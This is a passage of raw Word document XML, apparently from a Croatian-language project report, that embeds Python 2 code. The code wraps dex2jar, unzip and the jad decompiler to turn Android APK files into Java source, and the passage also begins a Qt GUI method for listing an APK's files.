        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>def dex2jar(filename):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    cmd1 = SYSPATH + "/dex2jar/dex2jar.bat " + "\"" + filename + "\""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    if os.system(cmd1) !=0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return 0</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newfilename = os.path.split(filename)[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    newfilename = os.path.splitext(newfilename)[0] + "_dex2jar.jar"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    cmd2 = "move /y " + "\"" + os.path.dirname(filename) + "\\" + newfilename + "\"" </w:t>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>+ " " + "\"" + os.getcwd() + "/temp/" + "\""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    print cmd2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    path = os.path.join(os.getcwd(), "temp")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    print path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not os.path.exists(path) : os.makedirs(path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    if os.system(cmd2) !=0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return 0</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if unzip(SYSPATH + "/temp/" + newfilename) != 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return 0</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return 1</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unzip the .jar file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># return 0: success;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>def unzip(filename):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    cmd = "unzip -o " + filename + " -d" + "\"" + SYSPATH + "\"" + "/temp/unzip"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    return os.system(cmd)</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decompile the apk to the Javacodes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>#       filename: the full absolute path of the apk file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># return 1: success; return 0:fail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>def decompile(filename):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    if clear() != 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    if dex2jar(filename) != 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    path = os.path.join(os.getcwd(), "temp/java")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    print path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not os.path.exists(path) : os.makedirs(path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    for root, dirs, files in os.walk(SYSPATH + "/temp/unzip"):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>for file in files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">     if file.endswith(".class"):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">cmd = SYSPATH + "/jad158e.linux.static/jad" + " -o -r  -sjava -d" + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>" " + SYSPATH + "/temp/java/ " + os.path.join(root, file)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>print cmd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>path = root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                print path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        if not os.path.exists(path) : os.makedirs(path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>if os.system(cmd) != 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          return 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6"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062D1C" w:rsidRDefault="00062D1C" w:rsidP="002033D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00867421" w:rsidRDefault="00867421" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc406756520"/>
      <w:bookmarkStart w:id="98" w:name="_Toc406756633"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>StartQT.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="00867421" w:rsidRDefault="0047024B" w:rsidP="0047024B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kod u ovoj datoteci je poprilično velik, tako da neće biti cijeli u ovoj datoteci već samo metoda koju treba zamijeniti:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5261B" w:rsidRDefault="00D5261B" w:rsidP="0047024B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>def Tab_Files(self, filename):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">            build the Files Tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">            @param filename: the opened apk's filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        print "enter tabfiles"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.treeWidget_files.clear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.treeWidget_files.setColumnCount(2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047024B" w:rsidRPr="00D5261B" w:rsidRDefault="0047024B" w:rsidP="00D5261B">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        # create a connect between signal and slot.</w:t>
      </w:r>
    </w:p>
